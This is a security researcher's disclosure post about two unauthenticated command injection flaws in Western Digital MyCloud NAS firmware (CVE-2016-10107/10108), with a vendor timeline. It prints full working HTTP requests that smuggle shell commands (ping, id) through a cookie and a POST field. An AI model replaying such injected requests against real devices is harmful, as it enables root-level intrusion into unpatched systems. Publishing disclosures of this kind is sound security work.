Command Injection vulnerability in Western Digital MyCloud NAS

The software version of my device is 2.11.142 and my device says that it’s up to date.

The first command injection vulnerability is in the home page URL, “/” in index.php Cookie. To detect successful exploitation I started Wireshark and watched for the pings sent to my IP address from the device.

The request:

GET / HTTP/1.1
Host: wdmycloudex2
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1

I deleted the PHPSESSID from the cookie and it still worked without any authentication.

The next one was in the /web/google_analytics.php URL.

POST /web/google_analytics.php HTTP/1.1
Host: wdmycloudex2
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://wdmycloudex2/
Content-Length: 52
Cookie: isAdmin=1; username=admin; username=admin; local_login=1; fw_version=2.11.142
Connection: close
cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23

I was also able to exploit this one unauthenticated on the LAN by deleting the PHPSESSID from the cookie and replaying the request from a different computer.

I submitted the vulnerabilities to Western Digital on 10/8/2016 and received word that they released a firmware update to remediate on 12/13/2016. These vulnerabilities have been submitted to Mitre for CVE assignment.

Update 1/3/2017: Mitre assigned CVE’s CVE-2016-10107 and CVE-2016-10108.

Update 1/10/2017: I received two new emails from Western Digital after the one they sent on 12/13/2016 telling me they released a firmware patch. They only patched 2016-10108.

On 12/29/2016:

On 1/9/2017:

Hacking the Internet of Things

I’m sitting around the house on a rainy Saturday, hacking on IoT (Internet of Things) devices (that I own) and discovered these command injection vulnerabilities.  🙂

The first command injection vulnerability was blind. I started up Wireshark and filtered on icmp and saw the pings. I removed the PHPSESSID from the cookie and the exploit worked without authentication.

blind-command-injection

This command injection vulnerability was a little easier to find due to the run_cmd in the response. It was so gratifying to see “root” printed on the screen!

capture20202

I removed the PHPSESSID from the cookie and resubmitted the request from another computer and got unauthenticated command injection.

capture10101

I’ve disclosed these vulnerabilities to the manufacturer and will provide an update with full disclosure after they have had time to fix the issues.